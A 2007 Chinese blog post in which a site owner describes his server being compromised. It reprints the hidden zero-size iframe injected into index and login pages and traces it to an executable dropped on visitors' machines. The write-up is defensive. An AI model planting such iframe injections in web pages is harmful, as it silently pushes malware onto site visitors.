服务器受到黑客入侵

Category : 站务 | Post on 2007/01/08 23:59 by Richard | Comments:2
今天晚上突然发现博客不能访问,继续检查,发现多个页面异常。

登录服务器仔细检查,发现服务器上面每一个目录的index.php和login.php文件都被人恶意擅改,在文件尾部增加97字节:
<iframe src=http://www.wowxlh.com/bbs/wap/encode/inf.htm width=0 height=0 frameborder=0></iframe>


受到入侵的文件包括整个网站所有目录中的:index.php、index.html、conn.asp、login.php、login.htm、default.htm文件。

黑客入侵操作的时间是今天(2007-01-08)的傍晚19:24。

幸亏我一直有备份,而数据库并没有受到影响。

继续拿下被调用的网站上的文件源代码进行分析,这次被入侵涉及的网站有:

1.http://www.wowxlh.com
 文件放在:http://www.wo...s/wap/encode/
 网站IP:202.102.3.9,服务器位于江苏省常州市电信,无ICP许可证编号
 域名在2006-4-19通过新网注册,管理员在广东东莞,而技术联系和帐务都在江苏常州。
 涉及文件:
 -inf.htm
 -1.htm
 -2.html

2.http://www.sinajy.com
 文件存放在:http://www.sinajy.com/www/
 网站IP:218.7.239.124,服务器位于黑龙江省哈尔滨市网通,无许可证编号
 公司地址:浙江省杭州市文四路668号万兴科技大厦十层 新浪网游
 域名在2006-8-10通过新网注册,域名联系人在山东济南。
 涉及文件:xiazai.exe
 作用:是即将植入到对方服务器c:\的种子,为了不引起注意,在对方服务器c:\起的文件名是:pageflies2.exe

入侵工作分析:在浏览已经被入侵的页面时,就使得植入对方网站html、php、asp的代码被执行,既inf.htm,它将sinajy.com上面的xiazai.exe文件通过http协议放到c:\pageflies2.exe。

除了破坏代码,具体行为有待进一步分析。

从涉及的文件存放目录看,涉及的两个网站都不是一般的人员可以放置文件的,这两个网站亦没有信产部备案的ICP许可号,不是疏于管理被他人所乘,就是其本身别有用心、或者内部人员参与入侵行为。

我将进一步追踪这件入侵事件。。。


最后编辑: Richard 编辑于2007/01/14 00:16
123
2007/02/09 10:16
请问如何清楚pageflies2.exe。
他有啥危害啊
zz
2008/02/16 15:24
hehe
辛苦鸟
分页: 1/1 第一页 1 最后页
发表评论
表情
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
昵称   密码   游客无需密码
网址   电邮   [注册]